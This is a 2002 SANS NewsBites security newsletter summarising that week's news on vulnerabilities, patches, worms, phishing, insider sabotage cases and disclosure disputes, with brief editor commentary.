-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

***********************************************************************
SANS NewsBites December 23, 2002 Vol. 4, Num. 52
***********************************************************************

TOP OF THE NEWS
20 December 2002 Report Says Cyberterrorism is Overhyped
19 December 2002 President Bush Signs e-Government Act
16 December 2002 Software Company Files Suit Over Vulnerability
                  Disclosure

THE REST OF THE WEEK'S NEWS
20 December 2002 Welsh Man Admits Authoring Three Viruses
19 December 2002 Cross-Site Scripting Vulnerability on Cisco.com
19 December 2002 NamesDirect.com Customer Info Exposed
18 December 2002 e-Clearance Initiative on Target
18 & 19 December 2002 Windows XP Vulnerability
16 & 17 December 2002 CERT/CC Warns of SSH Vulnerabilities
18 December 2002 Fix Available for Macromedia Flash Vulnerability
18 December 2002 RealNetworks Releases Fix
18 December 2002 Former Employee Charged with Cyber Sabotage
18 December 2002 Man Takes Control of al Qaeda Sites
17 & 18 December 2002 Iraq_Oil Worm
17 December 2002 Revised Cyberspace Strategy Due
17 December 2002 Survey Finds Surfing Opens Companies Up to Viruses
17 December 2002 Another Phony eBay Site Tries to Gather Personal Data
16 & 20 December 2002 CA HS Student Hacks School Computer for Project
16 December 2002 DEA Agent Who Sold Data Receives Prison Sentence

*************** This issue sponsored by SANS 2003 *******************

Why Do People Come Back Year After Year To SANS Annual Conferences?

"No other organization delivers courses with the technical detail,
organization and 'mentoring' that SANS provides. Many conferences turn
out to be very expensive marketing messages. SANS' vendor neutral
approach assures that I get the info that will best protect/support
my network. Ultimately, I come away from the conference a little more
paranoid but much better armed to protect my system."
(Tom E. Gonzales, Colorado State Employees Credit Union)

"The one primary reason that I keep coming back to SANS events is
the quality of the faculty."
(Jim Clausing, AT&T)

Early registration earns free bonus book: http://www.sans.org/SANS2003

***********************************************************************
TOP OF THE NEWS

 --20 December 2002 Report Says Cyberterrorism is Overhyped
A report for the Center for Strategic and International Studies says
that the threat of cyberterrorism is over-hyped, calling such threats
"weapons of mass annoyance" and comparing them to delayed flights
and broken off phone calls. The country's critical infrastructure
is accustomed to dealing with problems. Jim Lewis, who compiled the
report, allows that a cyber attack in concert with a physical attack
could compound the effects.
http://www.wired.com/news/infostructure/0,1377,56935,00.html
[Editor's Note (Schultz): I'm in full agreement with Mr. Lewis. I'm
sure that a genuine cyberterrorism threat exists, but it has been blown
far out of proportion. "Crying wolf" in the information security arena
is no new problem, but the events of September 11 have, unfortunately,
given impetus to louder and more extreme rhetoric.]

 --19 December 2002 President Bush Signs e-Government Act
The E-Government Act of 2002 has been signed into law; among other
provisions is a requirement that agencies test their systems for
security problems and address those they find.
http://www.eweek.com/article2/0,3959,794660,00.asp
[Editor's Note (Paller): Two contracting changes in the new law will
impact many government contractors: (1) contractors may take home a
share of the savings their e-Gov systems provide to the government, and
(2) security contractors that have the technical skills to fix security
vulnerabilities such as configuration flaws and perimeter errors will
take most of the contracts away from traditional contractors that can
only test for vulnerabilities but do not have the certified skills
needed to fix them. A listing of contractors with relevant skills
will help agencies choose effective contractors.]

 --16 December 2002 Software Company Files Suit Over Vulnerability
                     Disclosure
AutoProf.Com Inc., a New Hampshire software company, published a
white paper in July describing vulnerabilities in a tool from Florida
software company ScriptLogic Corp. ScriptLogic has filed a federal
lawsuit against AutoProf that accuses the Portsmouth-based company
of violating copyright laws and license agreements, and asks that the
company pay $75,000 in damages and recall their white paper. AutoProf
and ScriptLogic are competitors. The case underscores the need for
vulnerability disclosure guidelines.
http://www.gcn.com/21_34/security/20634-1.html

THE REST OF THE WEEK'S NEWS

 --20 December 2002 Welsh Man Admits Authoring Three Viruses
Simon Vallor of Wales has admitted to creating and spreading three
computer viruses, Gokar, Redesi and Admirer. Vallor has been released
on bail pending sentencing.
http://www.msnbc.com/news/850111.asp?0dm=T22BT
http://www.theregister.co.uk/content/55/28659.html

 --19 December 2002 Cross-Site Scripting Vulnerability on Cisco.com
The cisco.com web site is vulnerable to cross-site scripting, according
to an advisory from online security portal Securiteam.com. Cross-site
scripting vulnerabilities could allow attackers to steal information
that would let them log in to the site.
http://www.zdnet.com.au/newstech/security/story/0,2000024985,20270791,00.htm
[Editor's Note (Ranum): Yet another example of "security researchers"
hyping someone's vulnerability to market themselves. This is the
kind of thing that, if someone really wanted to help, would have
been cleared up quietly with a minimum of fuss and no need for a
self-serving grab at headlines. As long as the press continues to
reward this kind of behavior with headlines, we'll see this kind
of behavior.
My remarks about this same topic in the December 12 issue
of NewsBites shouldn't be construed as an attack directed
at ISS; my issue is with the disclosure-as-marketing
phenomenon. For a good counterpoint, there is an article at
http://www.issadvisor.com/viewtopic.php?t=41 that advocates the ISS
approach to vulnerability disclosure and discusses making the vendors
more accountable. For those following the vulnerability disclosure
saga, it's a worthwhile read. Robert Graham, Chris Klaus and I
have been carrying on an amiable private debate via Email on this
topic. Robert's posted a good opinion piece on his web site (see:
http://www.robertgraham.com/journal/021219-countercounterpoint.html )

 --19 December 2002 NamesDirect.com Customer Info Exposed
A website administrator and customer of NamesDirect.com discovered
company log-in credentials that provided access to large quantities of
sensitive customer data, including names associated with registered
domains, and home addresses, credit card numbers and expiration
dates. The log-in information was available on 13 web pages, and
furthermore, was quite easily guessed. The administrator tried to
let the company know about the problem, but the company didn't fix
the problem, so he took the information to CardCops.com, which in
turn told MSNBC.com; when MSNBC.com contacted the company about the
problem, they finally did address it.
http://www.msnbc.com/news/849290.asp

 --18 December 2002 e-Clearance Initiative on Target
The Office of Personnel Management (OPM) is taking steps to speed
up federal employee security clearances; widely used and helpful
forms are expected to be available on line soon. The OPM is heading
up the e-Clearance e-Government initiative, which should be complete
by May, 2003.
http://www.fcw.com/fcw/articles/2002/1216/web-opm-12-18-02.asp
[Editor's Note (Northcutt): The security risks of this are obvious as
evidenced by the story above. This is made even more interesting since
OPM intends to link to the DoD clearance adjudication service. What a
juicy target, all the information about people trusted with sensitive
information including the "dirt".
(Shpantzer): As the DEA and UBS story in this issue demonstrated,
security eventually hinges on the trustworthiness and reliability of
personnel with high levels of privilege. Streamlining the clearance
process while maintaining thoroughness is important because many
sensitive IT projects are not fully staffed due to investigative
backlogs.]

 --18 & 19 December 2002 Windows XP Vulnerability
A buffer overflow flaw in Microsoft Windows Shell in Windows XP could
allow specially crafted MP3 or WMA files to execute code that could
potentially alter data on vulnerable computers. Microsoft has deemed
the flaw "critical" and has released a patch for it.
http://www.msnbc.com/news/849418.asp?0dm=C24BT
http://news.com.com/2100-1001-978403.html
http://www.wired.com/news/technology/0,1282,56924,00.html
http://www.eweek.com/article2/0,3959,795100,00.asp
http://www.computerworld.com/securitytopics/security/holes/story/0,10801,76935,00.html
http://www.cert.org/advisories/CA-2002-37.ht
Microsoft bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-072.asp

 --16 & 17 December 2002 CERT/CC Warns of SSH Vulnerabilities
The Computer Emergency Response Team Coordination Center (CERT/CC) has
issued an advisory warning of a number of vulnerabilities in secure
shell (SSH) protocol implementations in SSH clients and servers. The
vulnerabilities occur prior to user authentication and could allow
arbitrary code execution or denial of service. CERT/CC recommends
applying appropriate vendor patches and limiting SSH server access.
http://www.cert.org/advisories/CA-2002-36.html
http://www.nwfusion.com/news/2002/1217certwarns.html
http://www.zdnet.com.au/newstech/security/story/0,2000024985,20270730,00.htm

 --18 December 2002 Fix Available for Macromedia Flash Vulnerability
Macromedia has released a new version of its Flash multimedia player
that addresses an overflow vulnerability that could be used to run
malicious code. Users running versions older than 6.0.65.0 are
encouraged to upgrade to the new edition, which is available on
Macromedia's web site.
http://www.pcworld.com/news/article/0,aid,108033,00.asp
http://news.zdnet.co.uk/story/0,,t269-s2127715,00.html

 --18 December 2002 RealNetworks Releases Fix
RealNetworks has released updates for buffer overflow flaws in its
RealOne Player products. RealNetworks had released a fix several
weeks ago which was found to have vulnerabilities.
http://www.eweek.com/article2/0,3959,793593,00.asp

 --18 December 2002 Former Employee Charged with Cyber Sabotage
Former UBS PaineWebber system administrator Roger Duronio has been
charged with sabotaging company computer systems in an attempt
to manipulate its stock price. Duronio placed logic bombs on the
computers that deleted files. Duronio has been charged with one count
of securities fraud and one count of violation of the Computer Fraud
and Abuse Act.
http://news.com.com/2100-1001-978386.html
http://www.philly.com/mld/inquirer/news/local/4763384.htm
http://www.theregister.co.uk/content/55/28630.html
[Editor's Note (Shpantzer): Separation of privilege is one of the most
important principles in security. How did this person gain access to
1,000 systems at branch offices across the country?]

 --18 December 2002 Man Takes Control of al Qaeda Sites
A Minnesota man said he took control of two web addresses that had
been used by al Qaeda to praise terrorist attacks. The man got the
information he needed by breaking into the Hotmail account of someone
listed as the contact for one of the sites. The man's actions have met
with much criticism; some say that he is hindering the government's
efforts to fight terrorism.
http://www.wired.com/news/conflict/0,2100,56896,00.html
[Editors' Note (Multiple): Sounds like he's also breaking the
law. Self-appointed vigilantes ultimately cause more trouble than
good.]

 --17 & 18 December 2002 Iraq_Oil Worm
The W32/Lioten worm, also known as the Iraq-_Oil worm, spreads through
shared folders in Windows XP, NT and 2000. The worm scans for machines
that are sharing folders and listens for responses from port 445
from computers using Windows Server Message Block. If it receives
a response, it tries to break into the machine through brute force
password guessing.
http://www.computerworld.com/securitytopics/security/virus/story/0,10801,76855,00.html
http://news.zdnet.co.uk/story/0,,t269-s2127738,00.html
[Editor's Note (Murray): If one must expose even a small part of one's
file system to the public networks, one should not expose both read and
write privileges on the same object. To do so invites the storage of
contraband on one's system; worse, it invites this kind of mischief.]

 --17 December 2002 Revised Cyberspace Strategy Due
The revised version of the National Strategy to Secure Cyberspace
is expected to be submitted for President Bush's approval next
soon. Among the changes in the document are increased responsibility
placed on Internet service providers (ISPs) for ensuring networks are
protected from cyber attacks, the need for improved wireless security
and for private companies to be more forthcoming with information
about computer vulnerabilities.
http://www.govexec.com/dailyfed/1202/121702td2.htm
[Editor's Note (Schultz): Requiring more responsibility on the part of
ISP's is the most appropriate recommendation of all. ISPs have too long
been a weak link, perhaps even the weakest link, in Internet security.
(Murray): I agree. However, I think that it is important that we not
give blanket endorsement to the government agenda. We should endorse
ISP cooperation with warrants while resisting routine cooperation
with warrantless, not to say unwarranted, queries.]

 --17 December 2002 Survey Finds Surfing Opens Companies Up to Viruses
Websense's Australian 2002 WebWork report found that companies
suffered virus infections as a result of employees surfing the web
during work. Websense recommends that businesses allow employees to
use their company e-mail account to conduct personal e-correspondence,
as many web-based e-mail services do not provide the virus protection
afforded by the company's own e-mail systems.
http://www.zdnet.com.au/newstech/hr/story/0,2000024989,20270733,00.htm
[Editor's Note (Grefer): The report itself can be found at
Work_Survey_2002.doc">http://www.websense.com/company/news/research/Australian_WebWork_Survey_2002.doc
How representative is a sample size of 143 technology professionals?
For comparison, the corresponding U.S. and European reports are
available at
http://www.websense.com/company/news/research/webatwork2002.pdf
http://www.websense.com/company/news/research/Internet_Misuse_Survey_2002.pdf]

 --17 December 2002 Another Phony eBay Site Tries to Gather Personal
                     Data
For the third time in recent weeks, eBay customers have been targeted
by a fraudulent site asking them to verify their account information;
the operators of the sites harvest eBay usernames and passwords as
well as credit card, banking, drivers' license and social security
numbers. An eBay spokesman says the company never asks members for
their passwords.
http://www.vnunet.com/News/1137643

 --16 & 20 December 2002 CA HS Student Hacks School Computer for
                          Project
A California high school student broke into the school's grades
database and changed his GPA from a perfect 4.0 to a 1.9. Reid
Ellison performed the intrusion as part of an approved project;
Ellison provided the school with three pages of suggestions for
improving its computer security.
http://www.theregister.co.uk/content/55/28658.html
http://www.siliconvalley.com/mld/siliconvalley/living/community/4754902.htm

 --16 December 2002 DEA Agent Who Sold Data Receives Prison Sentence
Emilio Calatayud, formerly of the U.S. Drug Enforcement Agency (DEA),
has received a 27-month prison sentence for selling information
from three sensitive law enforcement databases to an investigative
service. Calatayud will also pay a $5,000 fine.
http://online.securityfocus.com/news/1847
[Editor's Note (Murray): Sanctions for abuse of professional privileges
should be harsher than the same acts committed by others. Abuse of
law enforcement privileges must be harshly punished to preserve public
trust and confidence in the rule of law.]

===end===

NewsBites Editorial Board:
Kathy Bradford, Roland Grefer, Bill Murray, Stephen Northcutt, Alan
Paller, Marcus Ranum, Eugene Schultz and Gal Shpantzer

Please feel free to share this with interested parties via email,
but no posting is allowed on web sites. For a free subscription,
(and for free posters) e-mail sanssans.org with the subject:
Subscribe NewsBites

To update your address, visit http://www.sans.org/sansurl and enter
your SD number (from the header of this email.) You will receive your
personal URL via email.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+B6xf+LUG5KFpTkYRAlNiAKChBWtOZXbmWo9j4Hyewb9CPBbBkQCfQy+e
vYLVJO2MFi6bjmQOk7XJBWU=
=KbNN
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]